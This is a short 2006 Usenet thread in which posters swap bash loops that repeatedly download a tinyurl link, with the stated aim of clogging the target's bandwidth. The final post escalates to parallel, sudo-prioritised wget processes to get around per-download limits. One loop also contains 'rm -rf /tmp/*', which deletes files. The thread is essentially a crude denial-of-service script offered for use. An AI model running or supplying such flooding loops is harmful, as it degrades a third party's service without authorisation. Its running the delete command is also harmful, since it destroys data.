__/ [ ed ] on Sunday 24 September 2006 15:59 \__
> On Sun, 24 Sep 2006 15:53:36 +0100
> Roy Schestowitz <newsgroups@xxxxxxxxxxxxxxx> wrote:
>
>> Well, you could clog it up given enough bandwidth (or people).
>>
>> for dir in ln ~ ...
>> do
>> cd /tmp
>> wget http://tinyurl.com/kfgau
>> rm -rf /tmp/*
>> done
>
> Why waste disk space?
>
> while [ true ] ;
> do
> wget -O - http://tinyurl.com/kfgau > /dev/null ;
> done ;
In case of bandwidth limit per download,
while [ true ] ;
do
sudo nice --adjustment=-20 wget -O - http://tinyurl.com/kfgau > /dev/null &
sudo nice --adjustment=-20 wget -O - http://tinyurl.com/kfgau > /dev/null &
sudo nice --adjustment=-20 wget -O - http://tinyurl.com/kfgau > /dev/null ;
done ;
By the way, I thought about outputting to /dev/null, but couldn't find the
option (still not familiar with the weath of options in man wget).
|
|